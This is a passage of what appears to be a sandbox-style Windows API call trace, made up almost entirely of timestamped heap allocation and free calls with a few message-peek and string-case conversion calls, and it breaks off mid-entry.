[0077.042] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.043] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0077.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0077.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0077.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0077.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0077.044] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0077.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0077.044] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690920 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690790 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0077.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690910 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0077.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0077.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690780 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df70 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0077.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0077.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0077.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0077.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0077.047] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0077.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0077.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0077.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0077.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0077.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0077.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0077.048] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0077.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, 